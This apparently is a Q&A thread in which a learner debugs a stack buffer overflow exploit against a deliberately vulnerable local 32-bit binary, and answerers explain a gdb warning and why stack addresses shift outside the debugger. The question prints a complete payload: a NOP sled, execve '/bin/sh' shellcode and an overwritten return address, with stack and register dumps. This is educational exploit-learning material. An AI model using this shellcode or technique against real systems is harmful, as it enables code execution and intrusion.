# Cannot access memory at address, Buffer Overflow attempt

Tags: assembly, x86, gdb, reverse-engineering, exploit

I'm learning how to overflow the buffer. I have a hard time overwriting return address.
This is vulnerable code I'm trying to exploit:

```
(gdb) disas main 
Dump of assembler code for function main:
0x0804845b <+0>:     push   ebp
0x0804845c <+1>:     mov    ebp,esp
0x0804845e <+3>:     sub    esp,0x100
0x08048464 <+9>:     mov    eax,DWORD PTR [ebp+0xc]
0x08048467 <+12>:    add    eax,0x4
0x0804846a <+15>:    mov    eax,DWORD PTR [eax]
0x0804846c <+17>:    push   eax
0x0804846d <+18>:    call   0x8048340 <strlen@plt>
0x08048472 <+23>:    add    esp,0x4
0x08048475 <+26>:    mov    edx,eax
0x08048477 <+28>:    mov    eax,DWORD PTR [ebp+0xc]
0x0804847a <+31>:    add    eax,0x4
0x0804847d <+34>:    mov    eax,DWORD PTR [eax]
0x0804847f <+36>:    push   edx
0x08048480 <+37>:    push   eax
0x08048481 <+38>:    lea    eax,[ebp-0x100]
0x08048487 <+44>:    push   eax
0x08048488 <+45>:    call   0x8048320 <memcpy@plt>
0x0804848d <+50>:    add    esp,0xc
0x08048490 <+53>:    lea    eax,[ebp-0x100]
0x08048496 <+59>:    push   eax
0x08048497 <+60>:    call   0x8048310 <printf@plt>
0x0804849c <+65>:    add    esp,0x4
0x0804849f <+68>:    leave  
0x080484a0 <+69>:    ret
```

I have disabled `ASLR`.
I complied it with:

```
gcc -m32 -mpreferred-stack-boundary=2 -z execstack -fno-stack-protector vuln.c -o vuln
```

I'm using `-mpreferred-stack-boundary=2`, because without it, disassembly looks very different from tutorials I follow. Buffer is 256 bytes long. So 264 bytes are enough to overwrite the saved `EIP`, which I do with:

```
r $(python -c 'print "\x90"*234+"\x31\xc9\xf7\xe1\xb0\x0b\xeb\x06\x5b\x51\x53\x5b\xcd\x80\xe8\xf5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"+"\x58\xd0\xff\xff"')
```

Shellcode takes 26 bytes. Stack is looking like so when `EIP` is at `main+68`:

```
(gdb) x/100x $esp
0xffffd058:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd068:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd078:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd088:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd098:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd0a8:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd0b8:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd0c8:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd0d8:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd0e8:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd0f8:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd108:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd118:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd128:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd138:     0x90909090      0x90909090      0xc9319090      0x0bb0e1f7
0xffffd148:     0x515b06eb      0x80cd5b53      0xfffff5e8      0x69622fff
0xffffd158:     0x68732f6e      0xffffd058      0x00000002      0xffffd1f4
0xffffd168:     0xffffd200      0xf7feac7a      0x00000002      0xffffd1f4
0xffffd178:     0xffffd194      0x08049730      0x0804821c      0xf7fb2000
0xffffd188:     0x00000000      0x00000000      0x00000000      0xcad6d58d
0xffffd198:     0xf1c0519d      0x00000000      0x00000000      0x00000000
0xffffd1a8:     0x00000002      0x08048360      0x00000000      0xf7ff04b0
0xffffd1b8:     0xf7e25979      0xf7ffd000      0x00000002      0x08048360
0xffffd1c8:     0x00000000      0x08048381      0x0804845b      0x00000002
0xffffd1d8:     0xffffd1f4      0x080484b0      0x08048520      0xf7feb130
```

Return address is located at `0xFFFFD15C`. After `leave` stack looks like this:

```
(gdb) si
0x080484a0 in main ()
(gdb) x/16x $esp
0xffffd15c:     0xffffd058      0x00000002      0xffffd1f4      0xffffd200
0xffffd16c:     0xf7feac7a      0x00000002      0xffffd1f4      0xffffd194
0xffffd17c:     0x08049730      0x0804821c      0xf7fb2000      0x00000000
0xffffd18c:     0x00000000      0x00000000      0xcad6d58d      0xf1c0519d
```

The next instruction `ret`, should move address `0xFFFFD058` into `EIP` and execute nopslide with shellcode, but it isn't.

```
(gdb) si
Cannot access memory at address 0x68732f72
(gdb) x/16x $esp
0xffffd160:     0x00000002      0xffffd1f4      0xffffd200      0xf7feac7a
0xffffd170:     0x00000002      0xffffd1f4      0xffffd194      0x08049730
0xffffd180:     0x0804821c      0xf7fb2000      0x00000000      0x00000000
0xffffd190:     0x00000000      0xcad6d58d      0xf1c0519d      0x00000000
(gdb) i r
eax            0x109    265
ecx            0x0      0
edx            0xf7fb3878       -134530952
ebx            0xf7fb2000       -134537216
esp            0xffffd160       0xffffd160
ebp            0x68732f6e       0x68732f6e
esi            0x0      0
edi            0x0      0
eip            0xffffd058       0xffffd058
eflags         0x282    [ SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
```

Answer (score 5, accepted):

That's a harmless warning from `gdb`, it's not a program error. The `eip` is correctly set to `0xffffd058`. `gdb` is probably trying to access frame information, but since `ebp` is not valid, it fails. Doesn't affect the execution of your program, you can continue stepping as usual.

For program errors, you will clearly see a `SIGSEGV` error message.

Comment: That error was caused by python. I runned it without debugger and dumped a core. `Python Exception <class 'gdb.MemoryError'> Cannot access memory at address 0x80cd0bb4`. Now it works, but I had to relocate shellcode on the beggining. I had `SIGSEGV` in the middle of the shellcode execution. Somehow stack got altered and instructions changed.

Comment: Shellcode is executed only within `GDB`. When I run it from command line, I keep getting `SIGSEGV` and instructions are altered. For example `xor %eax, %eax` is changed into `enter  $0xe126,$0xf7` Why is this happening?

Comment: Different memory layout, you are probably overwriting your code, or jumping into middle of instructions.

Comment: Ok solved, when program starts system puts environment variables onto stack. `GDB`adds his own environment variables + shell variables. So the shellcode is moved in stack. To get absolute stack addresses, You need to unset variables from `GDB` and invoke program identically, because `argv[0]` matters too. http://stackoverflow.com/questions/17775186/buffer-overflow-works-in-gdb-but-not-without-it